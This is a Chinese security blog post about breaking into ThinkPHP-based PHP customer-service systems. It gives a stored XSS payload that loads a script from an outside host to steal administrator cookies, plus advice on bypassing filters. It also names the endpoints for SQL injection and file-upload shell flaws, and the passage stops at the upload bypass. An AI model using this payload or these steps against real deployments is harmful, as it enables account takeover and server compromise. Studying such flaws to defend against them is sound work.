欢迎您访问 最编程 本站为您分享编程语言代码,编程技术文章!
您现在的位置是: 首页

破解某客服系统的新策略

最编程 2024-08-09 18:49:53
...
  欢迎关注微信公众号

专注于网络安全领域,跟踪漏洞动态,深耕互联网,做一个深谙攻防之道的公众号。
同时涉足多个领域,是哲学,抑或是文学与艺术,关注金融市场,研究全球市场经济发展方向。

 

前言
本文从漏洞利用到对该客服系统进行渗透测试中遇到的问题做详细解析,
并在文章结尾公布黑客针对该系统进行攻击的样本。
文章目录
0x01 三重唱之漏洞利用
0x02 青出于蓝而胜于蓝
0x03 渗透测试思路解析
0x04 公布黑客攻击样本
系统介绍

<< 点击图片查看下一张 >>

这套客服系统是基于ThinkPHP开发的,并且经过了几个版本的演变。

 

1.小马PHP客服系统:这套系统应该是最早的,但是现在资产很少了。

2.迎客PHP客服系统:这个应该是某个小团队改改版权就用了的。

3.来客PHP客服系统

资产最多,成为主要攻击目标。

4.好客PHP客服系统

......

其实这些客服系统都大同小异,但是漏洞有一些区别,有的有,有的没有。

 

源码获取:关注公众号发送“客服系统”。

 

2023年03月22日更新:

获取源码之前我建议您先阅读下面这一篇文章的结尾。

传送门:https://mp.weixin.qq.com/s/gb6HCD2n5RILlmRIqh_GVA

 

如果您是我在文章里说的歪瓜裂枣,那么请你选择以下方式获取源码。

百度搜索:“ThinkPHP客服系统”或“ThinkPHP客服系统

 

安装教程请参考以下链接:

https://www.kancloud.cn/longlong52201/tp5_phpkefu/2244116/

https://blog.****.net/weixin_52154971/article/details/118999542

 

三重唱之漏洞利用
1
XSS攻击 (联系客服页)

漏洞位置:/admin/event/chat

漏洞危害:获取在线客服权限

 

XSS_Payload

<a href= hidden></a>测试<script src=//test.xss/xss1></script>

收到管理员Cookie

利用插件替换Cookie

访问:/admin/index/chats.html

该XSS漏洞不是每套客服系统都有,有些会被过滤。有时候会过滤中文,可以经过编码再发包。

还有,有时候能打到管理系统的Cookie,可以直接获得所有客服系统的管理权限,右上角位置返回系统即可。

直接发送Payload是没有效果的,需要改包发送。

 

2
注入漏洞(Dump)

 

漏洞位置:/admin/event/getwaitnum

漏洞危害:读取数据库内容

 

可以参考珂师傅的文章,这里不再细说。传送门:温故而知新,老系统挖老漏洞

 

3
文件上传漏洞 (GetShell)

 

漏洞位置:/admin/event/uploadimg

校验类型:黑名单验证

绕过方法:

上一篇: 应对智能客服难题:数据隐私与安全的挑战及其解决方案

下一篇: 给年轻人带来新灵魂:AIGC与开放社交的结合